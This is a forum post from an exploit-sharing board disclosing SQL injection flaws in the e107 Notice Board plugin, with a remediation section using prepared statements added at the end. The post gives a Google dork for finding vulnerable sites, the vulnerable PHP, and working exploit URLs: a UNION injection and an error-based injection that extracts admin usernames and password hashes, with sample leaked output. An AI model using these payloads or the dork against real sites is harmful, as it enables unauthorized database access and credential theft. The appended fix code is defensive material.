
30.08.2010, 13:35
Reservists Of Antichat - Level 6
Registered: 05.04.2009
Posts: 231
Reputation: 1148
Don't know if this has been posted before, but here it is:
I downloaded Plugins > E-Commerce > Notice Board from plugins.e107.org [download]
Author sunout
Date 13:10 14-May-10
dork: inurl:e107_plugins/nboard
e107_plugins/nboard/viewads.php
PHP code:
require_once("../../class2.php");
require_once(e_HANDLER."form_handler.php");
require_once(e_HANDLER."userclass_class.php");
@include_once(e_PLUGIN."nboard/languages/".e_LANGUAGE.".php");
$ns = new e107table;
require_once(HEADERF);
require_once("classmen.php");
$uspage = e_BASE;
$scat = $_GET['scat'];
$act = $_GET["act"];
//==================================Debug=======================================
if ($act == "det"){
$text .= "";
$sql->db_Select("nb_gnl", "*", "gnl_id='$scat' ");
while($row = $sql->db_Fetch()){
$gnl_id = $row['gnl_id'];
$gnl_name = $row['gnl_name'];
$gnl_city = $row['gnl_city'];
$gnl_picbig = $row['gnl_picbig'];
$gnl_small = $row['gnl_picsmall'];
$gnl_detail = $row['gnl_detail'];
$gnl_user = $row['gnl_user'];
$gnl_phone = $row['gnl_phone'];
$gnl_email = $row['gnl_email'];
$gnl_date = $row['gnl_date'];
$gnl_price = $row['gnl_price'];
$gnl_kikoz = $row['gnl_kikoz'];
/*...*/
//// output happens somewhere around here
}
$text .= "";
$caption = NB_NAME_6;
$ns->tablerender($caption, $text);
require_once(FOOTERF);
exploitation:
Code:
http://localhost/e107/e107_plugins/nboard/viewads.php?act=det&scat=1%27%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+
condition: mg=off
e107_plugins/nboard/nboard.php
PHP code:
/*...*/
$cat = $_GET['cat'];
$scat = $_GET['scat'];
$page = $_GET["page"];
/*...*/
//====================== all_select ============================//
function sql_cat($onpage, $page, $cat, $table){
$begin = $page * $onpage; // where to start from
$sql = "SELECT * FROM ".$table." WHERE gnl_scatid in (select subcat_id from ".MPREFIX."nb_subcat where subcat_catid=$cat) ORDER BY gnl_id DESC LIMIT ".$begin.", ".$onpage;
$result_cat = mysql_query($sql) or die(mysql_error());
return $result_cat;
echo $result_cat;
}
/*...*/
$onpage = 40; // records per page
$table = "".MPREFIX."nb_gnl"; // which table to read from
$page = page(); // determine the page
$result = sql_result($onpage, $page, $table, $gnl_pigbig);
$result_cat = sql_cat($onpage, $page, $cat, $table, $gnl_pigbig);
$result_scat = sql_scat($onpage, $page, $scat, $table, $gnl_pigbig);
/*...*/
Now there should be no conditions at all; by the way, it is a subquery there, so you have to break out with a closing parenthesis.
There is one more SQL injection in that file, but it needs mg=off.
I got tired of trying to get output and clicking around => if there is no value in nb_cat, the vulnerability is not exploitable.
Whoever feels like it, have a look.
In short, through the error:
Code:
http://localhost/e107/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+
Originally posted by None:
Duplicate entry 'admin:21232f297a57a5a743894a0e4a801fc3:1' for key 1
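For readers maintaining an e107 site, here is how the two query sites discussed in the post look once request input is kept out of the SQL text. This is an added example, not code from the nboard plugin or from e107; the helper names nboardId(), gnlByIdWhere() and sqlCatPrepared() are hypothetical, `$db` is assumed to be an open mysqli connection, and MPREFIX and the nb_gnl / nb_subcat table names are taken from the post. The last step of the post also depends on `or die(mysql_error())` printing the database error into the page, so the example reports driver errors as exceptions to be logged server-side instead of echoing them.

```php
<?php
declare(strict_types=1);

// Added example (not the plugin's own code). Driver errors become exceptions
// that the application logs; nothing from mysql_error() reaches the response.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

/**
 * Validate a numeric id taken from $_GET. Only a plain string of digits that
 * fits a positive int is accepted; a value such as "1' and 0 union ..." or
 * "1) and 1=(select ..." is rejected outright rather than escaped.
 * (Hypothetical helper name.)
 */
function nboardId(array $get, string $key): ?int
{
    if (!isset($get[$key]) || !is_string($get[$key])) {
        return null;
    }
    if (!preg_match('/\A[1-9][0-9]{0,9}\z/', $get[$key])) {
        return null;
    }
    return (int) $get[$key];
}

/**
 * viewads.php: the original interpolated $scat straight into
 *   $sql->db_Select("nb_gnl", "*", "gnl_id='$scat' ");
 * With the id validated to an int, the WHERE clause handed to db_Select
 * can only ever contain digits. (Hypothetical helper name.)
 */
function gnlByIdWhere(array $get): ?string
{
    $id = nboardId($get, 'scat');
    return $id === null ? null : 'gnl_id=' . $id;
}

/**
 * nboard.php: the original sql_cat() concatenated $cat into a sub-query and
 * ran it through mysql_query(). Here the same query is issued as a mysqli
 * prepared statement: the SQL text is fixed before any user data is seen,
 * and $cat, $begin and $onpage are bound as integers. (Hypothetical helper.)
 */
function sqlCatPrepared(mysqli $db, string $prefix, int $onpage, int $page, int $cat): mysqli_result
{
    $begin = $page * $onpage; // offset of the first record on this page
    $query = 'SELECT * FROM ' . $prefix . 'nb_gnl'
           . ' WHERE gnl_scatid IN (SELECT subcat_id FROM ' . $prefix . 'nb_subcat WHERE subcat_catid = ?)'
           . ' ORDER BY gnl_id DESC LIMIT ?, ?';
    $stmt = $db->prepare($query);
    $stmt->bind_param('iii', $cat, $begin, $onpage);
    $stmt->execute();
    return $stmt->get_result();
}

// Request handling as it would sit at the top of nboard.php. An invalid
// category is answered with a 400 and never reaches the database.
$cat = nboardId($_GET, 'cat');
if ($cat === null) {
    http_response_code(400);
    exit('invalid category');
}
// $where  = gnlByIdWhere($_GET);                        // for viewads.php
// $result = sqlCatPrepared($db, MPREFIX, 40, $page, $cat); // for nboard.php
```

Casting to int is enough for these two sites because both parameters are row ids; where a string column has to be matched, the same prepared-statement pattern applies with an `s` type in bind_param, which is what removes the dependency on magic_quotes (the "mg=off" condition in the post) altogether.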